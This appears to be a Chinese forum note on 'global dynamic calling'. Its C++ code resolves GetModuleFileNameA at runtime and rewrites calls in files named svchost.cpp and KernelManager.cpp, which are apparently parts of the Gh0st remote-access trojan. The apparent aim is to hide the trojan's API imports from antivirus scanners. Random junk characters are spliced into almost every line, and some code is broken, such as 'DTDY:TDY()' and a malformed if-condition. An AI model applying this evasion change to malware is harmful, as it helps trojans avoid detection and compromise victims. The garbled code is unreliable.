[原创文章] 全局动态调用 全局, 动态

ice_xke

全局动态调用笔记+ G* a. s, T6 b7 o7 z. s
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
- i0 g+ r' K- [& C# n  N----------------------------------------
+ I8 l% z. P& r' F  A5 dDTDY.h：: _# ]1 [: M$ K& |

& R, [, ~. n- M9 ~. D5 ?5 Z! T#if _MSC_VER>1000+ p1 F- [0 j) ~) }7 o
#pragma once
' @" G9 S, }2 F3 B) u#endif //_MSC_VER>1000+ P8 U& ?5 w+ [; |6 h& h% x
#include<windows.h>
- {, b) o' g) n% f1 ~  Q# |2 c9 N" G, O3 n5 ]9 e
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);: V( M. v% X- b5 p0 I$ A
class DTDY( L9 b7 M' a* V* `% I9 m- x
{& t/ _$ V" c6 V" j, J7 w% q: T# R
public:
6 G5 K. f* r% e5 r2 CDTDY();3 p8 I: T3 R: u" d3 v$ Y
virtual ~DTDY();
2 x" J$ v$ C+ a% D7 ppublic:4 X, \0 e+ P: p" P% A
static pGetModuleFileNameA MyGetModuleFileName;% r+ I, h* ]0 b1 `; e
static BOOL FunInitiallization();3 ~; X' r' W, U) h1 r
};8 `) Q0 e. r% P
#endif
6 m5 m& i$ U0 x! n$ I( e" h" W  l----------------------------------------9 ^. l2 E6 r8 v& o; U

/ P6 j8 O% O0 f! eDTDY.cpp:
+ H1 Q/ w" S8 J( T! P/ l* Q! |$ g  y% l6 _6 e( k/ i
#include "DTDY.h", j! Q( m& k; k* a. b
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
6 L! H+ A2 R0 `" u. xDTDY:TDY()
, s2 H: i6 K" ~7 _% S! b  B9 c, R{
" m7 X: F- f5 I  L* V+ g}
5 M3 A* {' y: i2 wDTDY::~DTDY()
$ j( N$ R, N2 Z8 v4 d6 `{5 v" U6 y' I$ ~0 S
}
: W% C" H4 K% H, F$ gBOOL DTDY::FunInitiallization()- V7 H. p5 `8 F1 W
{$ C  Z% s; X, E2 ^! A
HMODULE hModule=LoadLibrary("kernel32.dll");
! J3 v! F$ B. m) FMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");" V" W/ F6 D% b+ U
if(!MyGetModuleFileName=) return FALSE;
7 E+ M5 _# K7 a
9 e, a. H8 r- o4 b7 `return TRUE;
$ _7 p/ P% i5 Y. \}
- d7 o- D$ t) Q/ Y( T  P# Z: N----------------------------------------
- V5 s% Z+ S* a) d. K$ Asvchost.cpp:
; c/ |" z1 d6 w! F$ S5 B* M$ A1 \# \" G& T9 V
#include "DTDY.h"1 p+ H; G* f3 n6 L0 ~$ J# R

  f1 m5 |+ \+ ^) GBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
* C+ K6 [; I6 }4 I{
6 J! F: A2 D6 ?switch(ul_reason_for_call)
5 @0 d# ^% a; }4 u& A& f{  q; Z* J5 H' S5 e9 e* a
case DLL_PROCESS_ATTACH:1 @. ?1 ?8 @; ]+ Z+ \$ A2 H- E
if(!DTDY::FunInitiallization()) return FALSE;7 F3 ~4 i( Q1 i9 \3 _8 `& P* l! g
' Z& `) K) h% d/ f* u1 Y
break;" w8 Y6 c3 g1 u; Y7 ^
}6 i' v4 G* E- i& W  M: _! c
}# X! ?8 }1 x- S4 W: J: G

2 P9 I4 Y4 H. `
; N. w" K* M: n% H( @6 {GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def: W" y" L* T5 R; l
改写为
  x$ w6 H+ X0 p6 X& R0 n, H/ BDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));3 l! w1 i1 r' K: B1 C$ ~: U8 t. d. q
----------------------------------------& K, i; M% b% n8 Z
KernelManager.cpp:7 D; |+ h: o: o3 u& P) V: f
0 g$ ]# w; {1 X, T
#include "../DTDY.h"
, V" }9 w$ Q# b5 @/ w( ]5 a8 oGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));' K3 E" e! o4 m1 h5 }
改写为
' S" \- n1 \3 I/ l+ QDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));5 C# D1 x/ T$ Z% G* \3 ?" |- X
----------------------------------------